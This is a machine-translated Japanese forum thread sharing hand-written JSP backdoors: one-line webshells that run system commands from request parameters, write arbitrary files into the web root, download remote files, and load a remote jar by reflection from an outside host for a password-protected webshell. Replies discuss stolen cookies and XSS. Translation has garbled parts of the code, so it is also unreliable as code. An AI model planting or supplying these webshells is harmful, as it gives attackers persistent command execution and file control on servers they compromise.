この記事は機械翻訳のミラー記事です。元の記事にジャンプするにはこちらをクリックしてください。

眺める: 14991|答える: 7

【セキュリティツール】 手書きのJSP バックドア

[リンクをコピー]
掲載地 2015/01/02 18:46:57 | | | |
転属先:http://p2j.cn/?p=1627
1. システムコマンドの実行:
エコーなしでシステムコマンドを実行する:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
リクエスト:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
実行後はエコーがなく、バウンスシェルにはとても便利です。
パスワード認証に関する共通点があります:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i").getInputStream();        int a = -1;        バイト[] b = 新しいバイト[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
リクエスト:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. 文字列をエンコードし、指定されたファイルに書き込む:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes();%>
リクエスト:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
ウェブディレクトリに書き込み:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f").write(request.getParameter("c").getBytes();%>
リクエスト:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
リクエスト:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
ウェブディレクトリに書き込み:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
リクエスト:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: リモートファイルのダウンロード(apache io utilsを使っていなければ入力ストリームをバイトに変換できないので非常に長い...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u").openStream();    バイト[] b = 新しいバイト[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    一方((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
リクエスト:http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
ウェブパスへのダウンロード:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u").openStream();    バイト[] b = 新しいバイト[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    一方((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
リクエスト:http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
四つ目:リフレクションが外部の瓶を呼び出し、裏口を完璧にする
上記のバックドア機能があまりにも弱くて時代遅れだと感じるなら、これを試してみてください:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u")))).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
リクエスト:http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

包丁の接続:http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar、パスワード023。

解決策:
リフレクションを使って外部jarを現在のアプリケーションに読み込み、リフレクションが出力処理結果を実行します。 request.getParameterMap() は要求されたすべてのパラメータを含みます。 外部jarパッケージが読み込まれているため、サーバーはこのjarアドレスにアクセスできなければなりません。




先の:TXTテキストファイルの背後にある危機
次に:Java MD5暗号化、Base64暗号化および復号化 Javaはシステムコマンドソースコードを実行します
掲載地 2015/01/02 20:17:30 |
最近、JSP Backdoorについて調べていますか?
 地主| 掲載地 2015/01/02 20:39:44 |
管理者が2015年1月2日 20:17に投稿
最近、JSP Backdoorについて調べていますか?

JSPを一文で見たことはありますか? 見つけたのに、深く調べたわけではなく、xssの意味も理解できず、昨日ようやくクッキーを手に入れたのに、クッキーのアップロードをどうやって変更すればいいのかわかりません
掲載地 2015/01/02 20:44:40 |
Delver_Si 2015年1月2日 20:39に投稿
JSPを一文で見たことはありますか? 見つけたけど、深く調べなかったし、xssの意味も分からなかった。昨日やっとクッキーを手に入れたけど、クックの改造方法がわからない...

パーソナライズされた署名ファイルでクッキーが盗まれることはありません,,,

FirefoxのHackBarプラグインを使え
掲載地 2015/01/02 20:48:57 |
Delver_Si 2015年1月2日 20:39に投稿
JSPを一文で見たことはありますか? 見つけたけど、深く調べなかったし、xssの意味も分からなかった。昨日やっとクッキーを手に入れたけど、クックの改造方法がわからない...

ゴーストブラザー 多機能ブラウザ v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, ダウンロード数: 7, 販売価格: 1 グレインMB)
 地主| 掲載地 2015/01/02 20:57:50 |
管理者が2015年1月2日 20:44に投稿
パーソナライズされた署名ファイルでクッキーが盗まれることはありません,,,

FirefoxのHackBarプラグインを使え

昨日はフリードアがひどく動いていて、接続できず、Firefoxストアにも入れませんでした。
 地主| 掲載地 2015/01/02 20:59:01 |
管理者が2015年1月2日 20:44に投稿
パーソナライズされた署名ファイルでクッキーが盗まれることはありません,,,

FirefoxのHackBarプラグインを使え

DZにはこの抜け穴はありません
掲載地 2015/01/02 21:00:22 |
Delver_Si 2015年1月2日 20:59に投稿
DZにはこの抜け穴はありません

わからないけど、テストしてみていいよ、データベースを壊さないでね   

私たちは皆、壁を回り込むためにTorブラウザを使っています

免責事項:
Code Farmer Networkが発行するすべてのソフトウェア、プログラミング資料、記事は学習および研究目的のみを目的としています。 上記の内容は商業的または違法な目的で使用されてはならず、そうでなければ利用者はすべての結果を負うことになります。 このサイトの情報はインターネットからのものであり、著作権紛争はこのサイトとは関係ありません。 ダウンロード後24時間以内に上記の内容を完全にパソコンから削除してください。 もしこのプログラムを気に入ったら、正規のソフトウェアを支持し、登録を購入し、より良い本物のサービスを受けてください。 もし侵害があれば、メールでご連絡ください。

Mail To:help@itsvse.com